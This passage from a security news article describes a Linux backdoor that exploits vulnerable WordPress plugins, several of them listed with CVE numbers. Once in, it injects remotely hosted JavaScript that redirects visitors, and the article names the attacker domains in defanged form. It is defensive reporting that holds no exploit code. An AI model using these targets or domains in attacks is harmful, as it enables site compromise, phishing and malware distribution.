Templates Lite WP Quick Booking Manager Facebook Live Chat by Zotabox Blog Designer WordPress Plugin WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233) WP-Matomo Integration (WP-Piwik) WordPress ND Shortcodes For Visual Composer WP Live Chat Coming Soon Page and Maintenance Mode Hybrid Brizy WordPress Plugin FV Flowplayer Video Player WooCommerce WordPress Coming Soon Page WordPress theme OneTone Simple Fields WordPress Plugin WordPress Delucks SEO plugin Poll, Survey, Form & Quiz Maker by OpinionStage Social Metrics Tracker WPeMatico RSS Feed Fetcher Rich Reviews plugin “If one or more vulnerabilities are successfully exploited, the targeted page is injected with a malicious JavaScript that is downloaded from a remote server,” the Dr.Web writeup explained. “With that, the injection is done in such a way that when the infected page is loaded, this JavaScript will be initiated first—regardless of the original contents of the page. At this point, whenever users click anywhere on the infected page, they will be transferred to the website the attackers need users to go to.” The JavaScript contains links to a variety of malicious domains, including: lobbydesires[.]com letsmakeparty3[.]ga deliverygoodstrategies[.]com gabriellalovecats[.]com css[.]digestcolect[.]com clon[.]collectfasttracks[.]com Count[.]trackstatisticsss[.]com The screenshot below shows how the JavaScript appears in the page source of the infected site: The researchers found two versions of the backdoor: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2. They said the malware may have been in use for three years. WordPress plugins have long been a common means for infecting sites. While the security of the main application is fairly robust, many plugins are riddled with vulnerabilities that can lead to infection. Criminals use infected sites to redirect visitors to sites used for phishing, ad fraud, and distributing malware. People running WordPress sites should ensure that they’re using the most current versions of the main software as well as any plugins. They should prioritize updating any of the plugins listed above. Source

ce CMS utilizezi?